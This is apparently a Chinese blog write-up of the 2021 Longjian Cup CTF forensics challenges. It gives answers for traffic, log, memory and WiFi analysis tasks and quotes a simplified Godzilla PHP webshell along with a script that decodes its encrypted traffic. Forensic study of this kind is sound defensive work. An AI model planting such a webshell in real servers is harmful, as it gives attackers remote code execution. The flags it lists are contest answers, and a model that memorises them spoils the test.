• [陇剑杯2021] 复现


    签到

    此时正在进行的可能是__________协议的网络攻击。(如有字母请全部使用小写,填写样例:http、dns、ftp)

    NSSCTF{http} 

    jwt-1

    昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
    该网站使用了______认证方式。(如有字母请全部使用小写)

     追踪http流,包里看到token,

     就是jwt方式

     NSSCTF{jwt}

    jwt-2

    昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
    黑客绕过验证使用的jwt中,id和username是______。(中间使用#号隔开,例如1#admin)

     

    jwt-3

    昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
    黑客获取webshell之后,权限是______?

     

     流10里面看到执行了 whoami的命令

    jwt-4

    昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
    黑客上传的恶意文件文件名是_____________。

     写入文件的命令

    文件名:1.c

    jwt-5

    昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
    黑客在服务器上编译的恶意so文件,文件名是_____________。(请提交带有文件后缀的文件名,例如x.so)

     找就完了 

    looter.so

     

    jwt-6

    昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:
    黑客在服务器上修改了一个配置文件,文件的绝对路径为_____________。(请确认绝对路径后再提交)

     /etc/pam.d/common-auth

    webshell-1

    单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
    黑客登录系统使用的密码是_____________。

     

     

    webshell-2

    单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
    黑客修改了一个日志文件,文件的绝对路径为_____________。(请确认绝对路径后再提交)

    修改了日志文件,搜.log文件

     

    /var/www/html/data/Runtime/Logs/Home/21_08_07.log 

    webshell-3

    单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
    黑客获取webshell之后,权限是______?

     可以找到www-data flag也就是www-data

     

    webshell-4

    单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
    黑客写入的webshell文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)

     1.php

     

    webshell-5

    单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
    黑客上传的代理工具客户端名字是_____________。(如有字母请全部使用小写)

     

     不太理解, 还要忽略前两位然后base64

     代理工具客户端名字:frpc

    webshell-6

    单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
    黑客代理工具的回连服务端IP是_____________。

    第5题里面的写配置, 16进制转存

     192.168.239.123

    webshell-7

    单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:
    黑客的socks5的连接账号、密码是______。(中间使用#号隔开,例如admin#passwd)。

     

    0HDFt16cLQJ#JTN276Gp 

    简单日志分析-1

    某应用程序被攻击,请分析日志后作答:
    黑客攻击的参数是______。(如有字母请全部使用小写)
    

    user

    简单日志分析-2

    某应用程序被攻击,请分析日志后作答:
    黑客查看的秘密文件的绝对路径是_____________。

     

     /Th4s_IS_VERY_Import_Fi1e

    简单日志分析-3

    某应用程序被攻击,请分析日志后作答:
    黑客反弹shell的ip和端口是_____________。(格式使用“ip:端口",例如127.0.0.1:2333)

     

     192.168.2.197:8888

    日志分析-1

    单位某应用程序被攻击,请分析日志,进行作答:
    网络存在源码泄漏,源码文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)

    拿到log日志 可以直接url解码一下看得更清晰 

     

    www.zip 不陌生吧 

    日志分析-2

    分析攻击流量,黑客往/tmp目录写入一个文件,文件名为

     

    sess_car 

    日志分析-3

    单位某应用程序被攻击,请分析日志,进行作答:
    分析攻击流量,黑客使用的是______类读取了秘密文件

     SplFileObject

    SQL注入-1

    某应用程序被攻击,请分析日志后作答:
    黑客在注入过程中采用的注入手法叫_____________。(格式为4个汉字,例如“拼搏努力”)。

     

    布尔盲注 

    SQL注入-2

    黑客在注入过程中,最终获取flag的数据库名、表名和字段名是_____________。(格式为“数据库名#表名#字段名”,例如database#table#column)

    sqli 库 flag表 flag字段

    sqli#flag#flag 

     

    SQL注入-3

    黑客最后获取到的flag字符串为_____________

     观察发现当注入正确时,这个位置的数字>=480  

    根据这个提取正确的数据

    1. import re
    2. with open('sql.log','r') as file:
    3. lines=file.readlines()
    4. for line in lines:
    5. if (re.findall(r'200 (.+?) "-"',line))>=['479']:
    6. print(re.findall(r'%20=%20(.+?),1,',line))

     flag{deddcd67-bcfd-487e-b940-1217e668c7db}

     

    内存分析-1

    网管小王制作了一个虚拟机文件,让您来分析后作答:
    虚拟机的密码是_____________。(密码中为flag{xxxx},含有空格,提交时不要去掉)

     

    mimikatz

     flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}

    内存分析-2

    虚拟机中有一个某品牌手机的备份文件,文件里的图片里的字符串为_____________。(解题过程中需要用到上一题答案中flag{}内的内容进行处理。

    扫描桌面,有一个华为P40文件 

    然后dump下来 

    HUAWEI P40_2021-aa-bb xx.yy.zz.exe 为一自解压文件,解压后即为备份(直接点开dat文件)

    kobackupdec华为备份解密器   

     GitHub - RealityNet/kobackupdec: Huawei backup decryptor

    有bug,报错解决不来 

     

    WIFI

    网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量,让您来分析后作答:
    小王往upload-labs上传木马后进行了cat /flag,flag内容为_____________。

    《【陇剑杯WP】wifi题解》 - 腾讯云开发者社区-腾讯云 

     

    看客户端包:

    这是被加密的wifi包,有点信息 

    看vmem文件:

     就梭哈文件了,win嘛直接梭哈一波rar和zip就行了

    python2 vol.py -f Windows.vmem --profile=Win7SP1x86_23418 filescan | grep -E "rar|zip"
    

     dump出来

     加密的xml文件 ,找密码,在win能看到备注

     密码在网卡的GUID里,GUID 和接口绑定是绑定的,win7的wifi密码就存放在c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces[网卡Guid]中

    直接查接口!搜索Interface

    python2 vol.py -f Windows.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces" 

     密码就是{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}

     打开文件

    233@114514_qwe,应该是某个加密文件的密码,题目里也只剩下一个东西被加密了,那就是客户端pcap了。 

    无线方面kali也有工具,用最普通的工具去跑——airdecap-ng

    airdecap-ng -e My_Wifi -p 233@114514_qwe  khd.cap

    参数怎么来的呢 -e 指定目标网络ssid,-p 密码

    SSID=My_Wifi,密码233@114514_qwe,那么也衔接上了xml就是用来解码这个包的!

    就生成了新的客户端包

    最后一个http包

     

    看服务端的包:
    知道是上传了木马,那么肯定是通过post方式,查找post的包

     

     

     

    1. @session_start();//创建会话
    2. @set_time_limit(0);//防超时
    3. @error_reporting(0);//关闭报错页
    4. function encode($D,$K){
    5. for($i=0;$i$D);$i++) {
    6. $c = $K[$i+1&15];
    7. $D[$i] = $D[$i]^$c;
    8. }
    9. return $D;
    10. }//加密算法,对$D进行加密
    11. $pass='key';
    12. $payloadName='payload';
    13. $key='3c6e0b8a9c15224a';
    14. //这里是简化了马子,本来是三个参数再进行下面的运算
    15. if (isset($_POST[$pass])){
    16. $data=encode(base64_decode($_POST[$pass]),$key);//base64加密
    17. if (isset($_SESSION[$payloadName])){
    18. $payload=encode($_SESSION[$payloadName],$key);
    19. eval($payload);//session中的eval函数记录payload,这里是哥斯拉的强特征
    20. echo substr(md5($pass.$key),0,16);
    21. echo base64_encode(encode(@run($data),$key));
    22. echo substr(md5($pass.$key),16);//前后16位是md5,中间是base64加密
    23. }else{
    24. if (stripos($data,"getBasicsInfo")!==false){
    25. $_SESSION[$payloadName]=encode($data,$key);
    26. }//将payload存入session中
    27. }
    28. }

     了解到这是哥斯拉加密

    根据上面的文章可以知道(对于PHP_XOR_BASE64加密方式来说,前后各附加了16位的混淆字符),所以我们拿到的流量要先删除前16位和后16位字符,同时Godzilla的流量还会进行一个gzip压缩,因此最外层还要用gzdecode进行一次解码。
    最终解密1198号数据包的时候获取flag

    1. function encode($D,$K){
    2. for($i=0;$i$D);$i++) {
    3. $c = $K[$i+1&15];
    4. $D[$i] = $D[$i]^$c;
    5. }
    6. return $D;
    7. }
    8. $a='fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=';
    9. echo gzdecode(encode(base64_decode($a),'3c6e0b8a9c15224a'));
    10. ?>

    flag{5db5b7b0bb74babb66e1522f3a6b1b12}

    亿点复杂。。
     

    IOS-1 

    一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:
    黑客所控制的C&C服务器IP是_____________。

     全网最新最全首届“陇剑杯”网络安全大赛完整WIRTEUP --- ios(7题) - GKLBB - 博客园

     就是纯看tcp流了

    15流有东西 ,就是  3.128.156.159 了

    IOS-2

    黑客利用的Github开源项目的名字是______。

    还是这个流,有github链接,项目就是 stowaway 

     

    IOS-3

    通讯加密密钥的明文是____________。

    打开github链接,看使用方法 

     

     密钥就是 hack4sec

    IOS-4 

    黑客通过SQL盲注拿到了一个敏感数据,内容是____________。

    并没找到sql数据, 有很多TLS加密 

     编辑-首选项 用keylog.txt解密TLS 

    然后查看http2 ,并过滤一下 得到sql数据

     吐了,才知道直接复制就行,导出半天都不是很好的效果,直接全复制,浪费时间cao

     

    1. import re
    2. result = open('4.txt','w')
    3. with open('3.txt','r') as file:
    4. lines = file.readlines()
    5. for line in lines:
    6. result.writelines(re.findall(r'GET (.+?)WINDOW',line))
    7. result.writelines('\n')

     然后脚本过滤一下 再url解码一下

     找正确的值,最后16进制转一下 ,不写脚本了

    746558f3-c841-456b-85d7-d6c0f2edabb2

    IOS-5

    黑客端口扫描的扫描器的扫描范围是____________。(格式使用“开始端口-结束端口”,例如1-65535)

    就直接笨方法来过滤端口看 

     那就是 10-499 

    IOS-7

    黑客访问/攻击了内网的几个服务器,IP地址为____________。
    (多个IP之间按从小到大排序,使用#来分隔,例如127.0.0.1#192.168.0.1)

    access.log 里面有172.28.0.3 

     上题sql注入 是192.168.1.12

    所以就是 172.28.0.2#192.168.1.12

     

  • 相关阅读:
    现代 CMake 模块化项目管理指南
    JavaScript学习笔记
    敏捷组织 | 企业克服数字化浪潮冲击的路径
    第十九章 cookie和session
    约瑟夫环(循环列表实现)
    AOF是什么?
    【TypeScript】TypeScript 数据类型
    OC 新建项目流程2022
    Apache Hive 数据掩码函数教程
    前端面试整理
  • 原文地址:https://blog.csdn.net/qq_61768489/article/details/126320567